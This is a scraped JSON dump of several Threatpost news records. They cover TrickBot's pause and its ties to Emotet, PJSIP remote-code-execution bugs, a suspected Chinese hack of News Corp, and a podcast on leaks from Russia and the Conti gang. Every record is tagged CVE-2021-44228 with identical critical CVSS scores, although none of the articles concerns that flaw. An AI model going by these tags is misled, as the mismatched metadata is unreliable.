They concluded that the pause could be due to the TrickBot gang making a large operational shift to focus on partner malware, such as Emotet.\n\nA [report](<https://intel471.com/blog/trickbot-2022-emotet-bazar-loader>) from Intel 471 published on Thursday flagged a \u201cstrange\u201d period of relative inactivity, where \u201cfrom December 28, 2021 until February 17, 2022, Intel 471 researchers have not seen new TrickBot campaigns.\u201d\n\nBefore the lull, an [incident](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) last November indicated that the TrickBot botnet was used to distribute Emotet \u2013 indicating that the collaboration with the group behind the Emotet malware is ongoing. Intel 471 also tied in a third group \u2013 the operators of the Bazar malware family \u2013 whose controllers were found \u201cpushing commands to download and execute TrickBot (mid-2021) and Emotet (November 2021).\u201d\n\nThe report noted how, in years past, malicious actors have used TrickBot to install Emotet on target machines, and vice versa. Researchers speculated that, this time around, \u201cit\u2019s likely that the TrickBot operators have phased TrickBot malware out of their operations in favor of other platforms, such as Emotet.\u201d\n\n## **TrickBot\u2019s \u2018Turbulent\u2019 Recent History**\n\nTrickBot was originally deployed as a banking trojan, in 2016. 
In the time since, it\u2019s developed into a full-suite malware ecosystem, replete with tools for [spying and stealing data](<https://threatpost.com/trickbot-malware-virtual-desktop-espionage/167789/>), [port scanning](<https://threatpost.com/trickbot-port-scanning-module/163615/>), [anti-debugging](<https://threatpost.com/trickbot-crash-security-researchers-browsers/178046/>) \u2013 crashing researchers\u2019 browsers before they have a chance to identify its presence \u2013 [identifying and wiping firmware](<https://threatpost.com/trickbot-returns-bootkit-functions/161873/>), and much more.\n\nTrickBot has received particular attention from authorities in recent years. In 2020, Microsoft obtained a U.S. court order that allowed it to [seize](<https://threatpost.com/trickbot-takedown-crimeware-apparatus/160018/>) servers from the group behind the malware. Last year, [multiple](<https://threatpost.com/trickbot-coder-decades-prison/166732/>) [members](<https://threatpost.com/authorities-arrest-trickbot-member/169236/>) of that group were arrested and handed charges carrying potentially years-long prison sentences. Despite these efforts, TrickBot remained active.\n\nUntil late last December, that is, when new attacks ground to a halt. According to the report, Trickbot\u2019s most recent campaign \u201ccame on December 28, 2021. That was one of three malware campaigns that were active during the month. 
As a contrast, eight different [campaigns] were discovered in November 2021.\u201d\n\n\u201cWhile there have been lulls from time-to-time,\u201d the report noted, \u201cthis long of a break can be considered unusual.\u201d\n\nThe decline in activity continues as well: TrickBot\u2019s onboard malware configuration files, which contain a list of controller addresses to which the bot can connect, \u201chave gone untouched for long periods of time,\u201d researchers said.\n\nTellingly, these files \u201cwere once updated frequently, but are receiving fewer and fewer updates,\u201d researchers said. On the other hand, command-and-control (C2) infrastructure associated with TrickBot remains active, with updates adding \u201cadditional plugins, web injects and additional configurations to bots in the botnet.\u201d\n\nThe researchers have now concluded with high confidence that \u201cthis break is partially due to a big shift from TrickBot\u2019s operators, including working with the operators of Emotet.\u201d\n\n## **An Old Alliance**\n\nAs noted, the collaboration with Emotet (and Bazar Loader, for that matter) is not new. But researchers told Threatpost that the nature of the relationship could be evolving.\n\n\u201cIt\u2019s difficult to say what could result from the collaboration,\u201d wrote Hank Schless, senior manager for security solutions at Lookout, via email. \u201cWe do know that Emotet recently began testing how it could install Cobalt Strike beacons on previously infected devices, so maybe they could combine functionality with TrickBot.\u201d Cobalt Strike is a penetration testing tool used by cyber-analysts [and attackers](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) alike.\n\n\u201cIn the security industry, knowledge-sharing is how we discover some of the most nefarious threats,\u201d he noted. 
\u201cHowever, on the flip side of the coin you have threat actors who are doing the same thing \u2026 they share their malware on Dark Web forums and other platforms in ways that help the entire community advance their tactics.\u201d\n\nSometimes, cybercrime gangs have \u201cpartnerships or business relationships much like those that happen in conventional business,\u201d John Bambenek, principal threat hunter at Netenrich, told Threatpost via email. \u201cIn this case, it looks like the crew behind TrickBot decided it was easier to \u2018buy\u2019 than \u2018build.\u2019\u201d\n\nSome think the malware may be on its way out. After all, TrickBot is now five years old: a lifetime in cybersecurity terms. \u201cPerhaps,\u201d Intel 471 researchers wrote, \u201ca combination of unwanted attention to TrickBot and the availability of newer, improved malware platforms has convinced the operators of TrickBot to abandon it.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-25T21:32:15", "type": "threatpost", "title": "TrickBot Takes a Break, Leaving Researchers Scratching Their Heads", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-25T21:32:15", "id": "THREATPOST:9922BFA77AFE6A6D35DFEA77A4D195C0", "href": "https://threatpost.com/trickbot-break-researchers-scratching-heads/178678/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-01T21:49:53", "description": "[WhatsApp](<https://threatpost.com/facebooks-mandatory-data-sharing-whatsapp-ire/162828/>) and [BlueJeans](<https://www.bluejeans.com/>) are just two of the world\u2019s most popular communication apps that are using an open-source library riddled with newfound security holes.\n\nOne thing this open-source, flawed library shares with the Apache Log4J logging library [fiasco](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) that started in December: It\u2019s ubiquitous.\n\nThe library, [PJSIP](<https://github.com/pjsip/pjproject>) \u2013 an open-source multimedia communication library \u2013 is also used by[ Asterisk](<https://www.asterisk.org/>). Asterisk is an enterprise-class, open-source PBX (private branch exchange) [toolkit](<https://threatpost.com/voip-espionage-campaign-utilities-supplier/148916/>) that\u2019s used in voice-over-IP (VoIP) services in a massive number of implementations.\n\nAccording to the Asterisk site, the software is downloaded 2M times annually and runs on 1M servers in 170 countries. 
Asterisk powers IP PBX systems, VoIP gateways and conference servers, and it\u2019s used by SMBs, enterprises, call centers, carriers and governments.\n\nOn Monday, devops platform provider JFrog Security [disclosed](<https://jfrog.com/blog/jfrog-discloses-5-memory-corruption-vulnerabilities-in-pjsip-a-popular-multimedia-library/>) five memory-corruption vulnerabilities in PJSIP, which supplies an API that can be used by [IP telephony applications](<https://trac.pjsip.org/repos/wiki/Projects_Using_PJSIP>) such as voice-over-IP (VoIP) phones and conference apps.\n\nAn attacker who successfully triggers the vulnerabilities can flip the switch on remote code execution (RCE) in an application that uses the PJSIP library, JFrog researchers explained.\n\nFollowing JFrog\u2019s disclosure, PJSIP\u2019s maintainers have fixed the five CVEs, depicted below.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/01155749/PJSIP-security-vulnerabilities-e1646168517426.png>)\n\nThe disclosed PJSIP security vulnerabilities. Source: JFrog Security.\n\n## What Went Wrong\n\nIn its technical breakdown, JFrog researchers explained that the PJSIP framework offers a library named PJSUA that supplies an API for SIP applications.\n\n\u201cThe basic PJSUA APIs are also wrapped by object-oriented APIs. 
PJSUA offers a rich Media Manipulation API, where we have spotted the [five] vulnerabilities,\u201d they said.\n\nThree of the flaws are stack overflow vulnerabilities that can lead to RCE and which are rated 8.1 on the CVSS severity-rating scale.\n\nThe remaining two include a read out-of-bounds vulnerability and a buffer overflow weakness in the PJSUA API, both of which can lead to denial-of-service (DoS) and both of which are rated at CVSS 5.9.\n\n## Vulnerable Projects\n\nJFrog said that projects that use the PJSIP library before version 2.12 and which pass attacker-controlled arguments to any of the following APIs are vulnerable:\n\n * pjsua_player_create \u2013 filename argument must be attacker-controlled\n * pjsua_recorder_create \u2013 filename argument must be attacker-controlled\n * pjsua_playlist_create \u2013 file_names argument must be (partially) attacker-controlled\n * pjsua_call_dump \u2013 buffer argument capacity must be smaller than 128 bytes\n\nJFrog recommended upgrading PJSIP to version 2.12 to address the vulnerabilities.\n\n## Not the First Time\n\nPockmarks in PJSIP and other common videoconferencing architecture implementations are nothing new. In August 2018, Google Project Zero researcher Natalie Silvanovich [disclosed](<https://googleprojectzero.blogspot.com/2018/12/adventures-in-video-conferencing-part-1.html>) critical vulnerabilities in most of the common ones, including WebRTC (used by Chrome, Safari, Firefox, Facebook Messenger, Signal and others), PJSIP (which, again, is used by WhatsApp, BlueJeans and millions of implementations of Asterisk) and Apple\u2019s proprietary library for FaceTime.\n\n\u201cIf exploited, such vulnerabilities would have let attackers crash apps using the implementation, by merely placing a video call,\u201d noted Ronen Slavin, then head of research at Reason Cybersecurity and currently the co-founder and CTO at the source code control, detection, and response platform Cycode, back in 2019. 
\u201cThis would have then triggered a memory heap overflow which could allow the attacker to take over the victim\u2019s video calling account.\u201d\n\nApps such as Skype, Google Hangouts and WhatsApp \u201chave made it easy to have meaningful face-to-face interactions across between two points anywhere on the globe,\u201d he [wrote](<https://www.infosecurity-magazine.com/opinions/hacking-video-conferencing/>).\n\nIt was true then. But since, the pandemic has been gas on the fire when it comes to virtual connections: all the more reason to heed JFrog\u2019s advice and patch ASAP.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-01T21:44:32", "type": "threatpost", "title": "RCE Bugs in WhatsApp, Other Hugely Popular VoIP Apps: Patch Now!", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-01T21:44:32", "id": "THREATPOST:C9FBCC2A1C52CDB54C6AAB18987100F4", "href": "https://threatpost.com/rce-bugs-whatsapp-popular-voip-apps-patch-now/178719/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "The Chinese hackers responsible for an attack on media giant News Corp last month likely were seeking intelligence to serve China\u2019s interests in a cyberespionage incident that shows the persistent vulnerability of corporate networks to email-based attacks, security professionals said.\n\n[Reports](<https://www.theguardian.com/media/2022/feb/04/new-corp-hack-murdoch-media-firm-believes-hackers-links-china>) on Monday revealed that a Jan. 20 incident at Rupert Murdoch\u2019s media giant involved an attack on journalists\u2019 email accounts that gave the intruders access to sensitive data. The breach \u2013 limited to several individuals working for outlets including News UK, the Wall Street Journal and the New York Post \u2013 has raised concerns over the safety of confidential sources working with journalists affected by the incident.\n\nIn an email to staff, News Corp cited a \u201cforeign government\u201d as responsible for the \u201cpersistent nation-state attack\u201d and confirmed that \u201csome data\u201d was stolen, according to published reports. 
The media giant enlisted the help of cybersecurity firm [Mandiant](<https://www.mandiant.com/>) to investigate the incident, which the firm said is likely the work of a China-sponsored actor.\n\n\u201cMandiant assesses that those behind this activity have a China nexus, and we believe they are likely involved in espionage activities to collect intelligence to benefit China\u2019s interests,\u201d said David Wong, vice president of consulting at Mandiant, in an emailed statement to Threatpost.\n\n## **Targeting Journalists for Cyberespionage**\n\nIndeed, while China typically targets \u201cmilitary and intellectual property\u201d in its state-sponsored attacks, journalists also are \u201cfairly high on their radar for espionage\u201d due to their work with sources \u2013 confidential and otherwise, as noted by one cybersecurity professional.\n\n\u201cJournalists can have access to sources and intelligence about adversaries and other opponents of the Chinese regime, both foreign and domestic, or can be researching stories that could generate negative publicity for the Chinese government,\u201d Mike McLellan, director of intelligence for cyber threat intelligence firm [Secureworks Counter Threat Unit](<https://www.secureworks.com/about/counter-threat-unit>), wrote in an email to Threatpost on Monday.\n\nPaul Farrington, chief product officer for security firm [Glasswall](<https://glasswallsolutions.com/>), agreed that it\u2019s \u201ccommon for politically motivated cybercriminals to mine reporters\u2019 materials for intelligence,\u201d given their frequent conversations with confidential sources that have access to information about current and future geopolitical events.\n\nMoreover, China has previously shown an interest in attacking journalists, making this latest attack \u201centirely consistent with past Chinese state-sponsored behavior,\u201d concurred Dave Merkel, CEO of cybersecurity firm [Expel](<http://www.expel.io/>).\n\nHe cited [a previous 
attack](<https://threatpost.com/inside-targeted-attack-new-york-times-013113/77477/>) on the New York Times by China in 2013 as a precedent for the nation\u2019s targeting of journalists. Moreover, the threat actors\u2019 use of business email compromise (BEC) to pull off the attack \u201cmakes sense\u201d and also is consistent with nation-state actors, Merkel observed.\n\n\u201cWhen it comes to cyberattacks, nation state actors will only be as advanced as they have to \u2013 why burn expensive zero days if you don\u2019t need to?\u201d he said.\n\n## **Preventing BEC Attacks**\n\nIn fact, Merkel said the No. 1 source of attacks against Expel customers is BEC. \u201cThere\u2019s no reason to think Chinese state-sponsored groups wouldn\u2019t use the same tactics against their targets if those tactics work \u2013 and news organizations are definitely targets,\u201d he said.\n\nIndeed, BEC is a major threat that typically involves human error. The way it works is that an employee at a company receives an email with a malicious link or document and takes an action that can install malware on their computers. This can result in consequences from local data theft to giving threat actors access to the corporate network to advanced attack vectors such as ransomware.\n\nMicrosoft unveiled a timely yet unrelated step this week that could help mitigate the impact of, or even prevent, future BEC attacks: Namely, the company will soon begin blocking, by default, VBA macros obtained from the internet in five Office apps, as the company [revealed in a blog post](<https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805>) Monday.\n\n\u201cFor macros in files obtained from the internet, users will no longer be able to enable content with a click of a button,\u201d Microsoft Principal Program Manager Kellie Eickmeyer wrote. 
\u201cA message bar will appear for users notifying them with a button to learn more.\u201d\n\nThis default setting \u201cis more secure and is expected to keep more users safe including home users and information workers in managed organizations,\u201d she added. Indeed, sending documents loaded with macros that immediately install malware on people\u2019s computers with one click is a popular tactic of email-based attacks.\n\nThe new default setting will apply to Microsoft Office on devices running Windows for Access, Excel, PowerPoint, Visio and Word. Microsoft will roll out the change first in a preview version of Office 2023, starting with its Current Channel update channel in early April 2022.\n\nLater, the change will be available in the other update channels, such as Current Channel, Monthly Enterprise Channel, and Semi-Annual Enterprise Channel. In the future Microsoft also will change the Office default setting for VBA macros in Office LTSC, Office 2021, Office 2019, Office 2016 and Office 2013, Eickmeyer added.\n\nThis move may make it more difficult to slip malware past corporate employees using BEC tactics. 
However, as one security professional noted, companies still must remain vigilant and take an \u201call hands on deck\u201d approach to both threat mitigation and response, given the evolving nature and increased occurrence of cyber-attacks that organizations face.\n\n\u201cAs the threat environment continues to change, proper and continuous diligence is required to ensure all cyber defensive tools and techniques are employed to protect your most precious data assets,\u201d observed Tom Garrubba, vice president at risk-management firm [Shared Assessments](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUY-2Flf1YfJi8Jl6Pa8fYnwMooXA0t7nRcGwuHZmhL1VNFMgZ7_ZRLSPEhX0sWy6v6-2FW4BoBGwvynWnvEEKCCoI2tE2RSv7Ap1BbaYTRGgOsmBtH3N8QKMiyASu9uND9imXoTFn2Ec5EmRJ9V9NBrK7aLIAhF6196NdmcyMkxC1VH7FuP-2B9MgrfUoUGWizcYBWkO7YHK-2FSUvJvNf4hmd993Dye56pyq89HFwWZoHTuzoXanpznaaoSlcLfzlPiOUFNRXQsUtdLW6-2BFIvjy5oI3kpt8fOysQ-2BJJ7pNAMDmmGf2nc2TWwK5J4rfFBha96XAcFn5Tdh8idS0UjuT6a1Fel8Ug5x5WkloyV8fxoFRJXaTFLqD0L0IDktPIPckEiewFCmD6TiVprT0ERdmp5-2BqTF3UZ3I98-3D>), in an email to Threatpost. 
\u201cContinuous intelligence, monitoring, and dialogue with critical partners and suppliers should be ongoing to ensure \u2018all is ready\u2019 in the event recovery is needed, and that additional support is available in the event something were to occur.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-08T14:14:59", "type": "threatpost", "title": "China Suspected of News Corp Cyberespionage Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-08T14:14:59", "id": "THREATPOST:3B06E49AA3C9F001C97038682A9BF73F", "href": "https://threatpost.com/china-suspected-news-corp-cyberespionage/178277/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-04T03:51:25", "description": "Information about nuclear plants and air force capabilities. 
Conti ransomware gang crooks [conjecturing](<https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-i-evasion/>) that the National Security Agency (NSA) was maybe behind the mysterious, months-long [TrickBot](<https://threatpost.com/trickbot-amazon-paypal-top-brands/178483/>) [lull](<https://threatpost.com/trickbot-break-researchers-scratching-heads/178678/>). [Doxxed data](<https://www.theregister.com/2022/03/02/russian_soldier_leaks/>) about 120K Russian soldiers.\n\nThose are just some of the sensitive, valuable data that\u2019s being hacked out of Russia in the [cyber war zone](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) \u2013 a war that erupted [even before](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>) the country invaded Ukraine.\n\n\u201cEveryone is so focused on Russia hacking the world, but the world has been hacking Russia\u2026. And dumping a lot of critical data on military, nuclear plants, etc.,\u201d said Vinny Troia, cybersecurity Ph.D. and founder of [ShadowByte](<https://shadowbyte.com/>), a dark web threat intelligence and cyber fraud investigations firm.\n\nHe\u2019s one of an untold number of experts on dark-web threat intelligence who\u2019ve been pouring over the intel that\u2019s been flooding out of practically every nook and cranny of the internet: data that\u2019s being posted on Twitter, Telegram and within the multiple dumps of insider knowledge about the Conti ransomware gang posted by the Ukrainian supporter ContiLeaks.\n\n\n\n(Brought to you by SpecOps. 
Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nThat ongoing dump, which has included [source code](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>) for Conti and TrickBot, a decryptor (that doesn\u2019t help recent victims whose files have been encrypted by the Conti gang, unfortunately), and much more, stopped yesterday when the Conti gang shut down its Jabber servers, Troia told Threatpost on Wednesday.\n\nHe visited the Threatpost podcast to update us on the mountain of data about Russia that intelligence experts are now slogging through.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/030222_Vinny_Troia_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>). Also, see below for a lightly edited transcript. \n\n\n## Lightly Edited Transcript\n\n**Lisa Vaas:** Listeners, welcome to the Threatpost podcast. My guest today is Vinny Troia, cybersecurity PhD and founder of ShadowByte, a dark web threat intelligence and cyber fraud investigations firm. Today, we\u2019re going to focus on all of the data that\u2019s being leaked on Russia as a result of its invasion of Ukraine.\n\n**Lisa Vaas:** Thanks for coming on the podcast. Vinny, before we jump in, could you give us a bit of your background, please?\n\n**Vinny Troia:** Sure. Thanks for having me. Yes. So my background I come from a DOD background did a lot of work for surface deployment command. And yeah, I was there for about, I think six or seven years before moving over to private sector.\n\n**Vinny Troia:** And while I was there, I did a lot of work in compliance and random security hacking projects, a lot of red teaming, pen testing. And then eventually I started my own firm. 
Fast forward to today, our focus now is primarily dealing with a lot of ransomware cases, incident response, and we do a lot of ransom negotiations as well.\n\n**Vinny Troia:** We\u2019re constantly focused on dark web threat actors and any of the players, really.\n\n**Lisa Vaas:** Thank you for that. And well this past week must be just a flurry with the dark web activity around Ukraine and Russia. So in an email, you were talking about how everyone is so focused on Russia hacking the world, but the world has been also hacking Russia and dumping a lot of critical data on military nuclear plants, etc.\n\n**Lisa Vaas:** Where is your Intel coming from? Are there any forums in particular that you\u2019re clued into or is that something you can\u2019t even discuss?\n\n**Vinny Troia:** it\u2019s not even like that. It\u2019s a, I mean, it\u2019s literally everywhere. I mean, there\u2019s Telegram channels. I mean, some is just being pasted right on Twitter.\n\n**Vinny Troia:** I mean, it\u2019s literally coming from all angles at this point.\n\n**Lisa Vaas:** Well, tell me what you\u2019re seeing.\n\n**Vinny Troia:** I\u2019d say last month, there was a lot of data coming out about Ukrainian citizens. I mean, a lot. So that was kind of interesting, almost like a precursor to what was happening.\n\n**Vinny Troia:** And now it\u2019s almost like, the rest of the world that\u2019s really pissed and started hacking back and you\u2019re seeing so much data coming out. I\u2019m actually looking for sorry, as we speak, I\u2019m going through some of this data. I mean, there\u2019s stuff on a nuclear plants, some of their air force capabilities.\n\n**Vinny Troia:** There\u2019s another database that I just recently came across that is about a hundred thousand of their military members with photos, passport numbers, things like that. I mean, it\u2019s really just data coming from all depths of. 
From other infrastructure,\n\n**Lisa Vaas:** well, who, who, who is the primary sources?\n\n**Lisa Vaas:** I mean, I know that anonymous of course has jumped in to, to, to wage war on behalf of Ukraine, cyber war on behalf of Ukraine. And I know that you can put out a call for help from cyber experts on this too. So who, who exactly is, is. Hacking this stuff out of Russia.\n\n**Vinny Troia:** I mean, I, honestly, I couldn\u2019t tell you, I mean, it\u2019s coming, like I said, it\u2019s coming from all sorts of places.\n\n**Vinny Troia:** Right. And when things get leaked, I mean, they just get leaked from various [sources\u2019] usernames on forums or Telegram channels. And so you never really know who it\u2019s coming from. It is interesting that the world kind of banded together against this. And Russia was supposed to have this big cyber arsenal against them.\n\n**Vinny Troia:** And it\u2019s really funny that Joe Biden didn\u2019t mention security once in the state of the union last night, being that it was such a big deal and everybody\u2019s been talking about it.\n\n**Lisa Vaas:** Yeah. And, and I remember it was an NBC news last week or, or was reporting on the big cyberattacks, the major offensive cyberattacks that were being discussed at the White House, but then the White House denied [considering offensive cyberattacks].\n\n**Vinny Troia:** The news has been all about cyberattacks and Russia\u2019s capabilities and it\u2019s such a priority, but it just wasn\u2019t even mentioned once. I just, I find that really strange, but regardless, it\u2019s nice that the world kind of banded together to really come after Russia. One of the most, honestly, just incredibly fascinating things is all these leaks that have been occurring regarding the Conti ransomware. Yes. And they\u2019re arguably the largest or at least one of the top few largest ransomware groups in the world. 
And I mean, they\u2019re just having everything leak: source code, recovery, keys, chat logs.\n\n**Vinny Troia:** I mean, as early, as recently as today with the most recent chat logs that came out, so somebody still has access to their servers and I haven\u2019t even had a chance to read the ones from today.\n\n**Lisa Vaas:** I just wrote up the second dump and I didn\u2019t even know there was more posted today. It\u2019s so hard to keep up. Can we talk a little bit about those dumps? Now as I understand it, it\u2019s the decryptor for version two of the Conti Lock ransomware software [that was leaked]. That\u2019s not even going to be usable to anybody because it was for an older version.\n\n**Lisa Vaas:** How is this going to affect Conti? Another one of my sources was telling me that just one of the gang\u2019s groups got hit by this [leak] and everybody else is pretty much doing fine. They\u2019re carrying on business as usual.\n\n**Vinny Troia:** I think what\u2019s really interesting. And they talked about this in one of the, in some of the logs. So Conti uses, or used, this one piece of software called TrickBot in order to disseminate and \u2026 one of the or groupings of the chat log showed that the NSA came after TrickBot specifically.\n\n**Vinny Troia:** I don\u2019t know whether or not they reverse engineered or what they did, but I mean, they were able to shut it down for a couple of weeks just by changing patch numbers and uploading them to a server that would accept the changes. And so what they did was they maxed out the maximum patch number.\n\n**Vinny Troia:** The software couldn\u2019t take any new updates at that point. So they effectively shut it down for a little bit. That was actually really amazing.\n\n**Lisa Vaas:** I totally missed that. Which repository was that in? 
What\u2019s the name of the repository?\n\n**Vinny Troia:** It\u2019s all JSON files.\n\n**Lisa Vaas:** Everybody knew that TrickBot pretty much shut down for a few months, but I didn\u2019t know that about the NSA piece.\n\n**Vinny Troia:** It\u2019s presumed to be the NSA, given the level of skill that was involved, we\u2019ll call it finesse. I would say it would have to be some government agency.\n\n**Lisa Vaas:** Was there chatter about the shutdown?\n\n**Vinny Troia:** Yeah, it\u2019s basically a handful of officials talking about it and how they were shut down and how they basically had to rebuild their infrastructure.\n\n**Vinny Troia:** They were down for a little bit and eventually they came back, but it just shows that they were being targeted by nation states. I think the most interesting thing is, if this really is a Russian operated group, which is what it seems like, then the fact that all these files are being leaked, whether it\u2019s from an insider or somebody who\u2019s a researcher who\u2019s attacking them specifically, I think this is going to have a major toll on Russia\u2019s finances, especially considering this is a group that is averaging what, a couple hundred million dollars a year recurring revenue?\n\n**Lisa Vaas:** I don\u2019t expect you to know this, but maybe you do: How much of Russia\u2019s economy is actually coming from ransomware or other malware?\n\n**Vinny Troia:** I think the majority, actually. So I think the majority of Russia\u2019s economy is coming from some sort of crime. There\u2019s not a whole lot going on over there. It\u2019s like a big wasteland,\n\n**Lisa Vaas:** Right. The underground members say \u201cprotect the motherland, the motherland protects you.\u201d Except for when they need some stooges to arrest, some low-level stooges to make the U.S. happy, which happened recently.\n\n**Vinny Troia:** As far as the decryptor [goes], you\u2019re correct. It is for an older version. 
I think I saw some keys floating around as well, but new code is written on top of old code and it\u2019s not like it was replaced completely. So I would imagine that there will be some fallout from that code base.\n\n**Lisa Vaas:** Yeah, there\u2019s a lot of code to go through. I hear. So what were some other really great finds in the intelligence that we\u2019re getting out of Russia during this crisis?\n\n**Vinny Troia:** It\u2019s information on citizens, it\u2019s information on military members. I\u2019ve seen things on nuclear plants. I can\u2019t speak to what can be done with all of it, honestly, but the point is it\u2019s there and, in the right hands, I\u2019m sure it could be pretty useful.\n\n**Lisa Vaas:** I assume, during these days, it\u2019s just not going to let up.\n\n**Vinny Troia:** No, and like I said, a couple of hours ago we had more leaks from their Jabber server. So I would imagine whoever has access has been able to pull off a lot, and I think [Conti] actually just shut it down finally.\n\n**Lisa Vaas:** So that means they shut down Jabber. That doesn\u2019t mean that they figured out who the leaker is. Right?\n\n**Vinny Troia:** The person leaking it goes by [ContiLeaks]. But whether or not he\u2019s the one with access, I don\u2019t know. But the point is they figured out that somebody did have access to their Jabber logs. So now they\u2019ve moved servers.\n\n**Lisa Vaas:** Well, awesome. What else can you tell listeners? What can you leave us with?\n\n**Vinny Troia:** I would say that, just because Conti\u2019s out doesn\u2019t mean that the problem is going away anytime soon. So be diligent and keep up with your passwords and make sure that you actually have fresh passwords, because looking at these logs and how they\u2019re getting into a lot of these systems, it\u2019s just using other people\u2019s recycled passwords.\n\n**Vinny Troia:** The hacks they\u2019re using aren\u2019t even that sophisticated. 
And I mean, even now the majority of hacks are still caused by reused passwords.\n\n**Lisa Vaas:** We can get some intelligence out of the exploits that they\u2019re targeting. I think I saw Zerologin was mentioned as one, and of course we know a lot about their tooling right now. Like the whole Cobalt Strike beacon thing.\n\n**Vinny Troia:** Cobalt Strike\u2019s been a red teaming tool forever. It\u2019s a staple. For pen testers, it\u2019s an amazing tool. And so the fact that they were using it isn\u2019t really a surprise.\n\n**Lisa Vaas:** Well, is there anything surprising that was found in the dumps? I know that we\u2019ve got email addresses of some of the members of the gang.\n\n**Vinny Troia:** You can use that to look for other accounts and potentially start to reverse back to maybe who they are. But I mean, there\u2019s so much information here. I haven\u2019t even gone through maybe a 10th of it. It\u2019s coming up too fast. It\u2019s a full-time job. It takes a full-time team at this point to go through all of this. Because then there was another thing that came out: rocket chat logs from a rocket chat. There\u2019s thousands of logs here.\n\n**Lisa Vaas:** Yeah, that\u2019s pretty bad. When you\u2019ve got a researcher, an intel expert who says he\u2019s getting too much: The firehouse is open so wide. So the takeaways for listeners are that these leaks haven\u2019t stopped, and we don\u2019t even know how many that [ContiLeaks] is promising.\n\n**Vinny Troia:** I mean, the fact that today\u2019s leaks caused the shutdown, I presume caused a shut down of their Jabber server. I\u2019m going to say that well has pretty much run dry. I don\u2019t know what else is going to be released in terms of tools, but I\u2019d say all of this has probably put a dent in everything they\u2019re doing for a little bit.\n\n**Lisa Vaas:** We can hope so, but I don\u2019t think we should assume anything. 
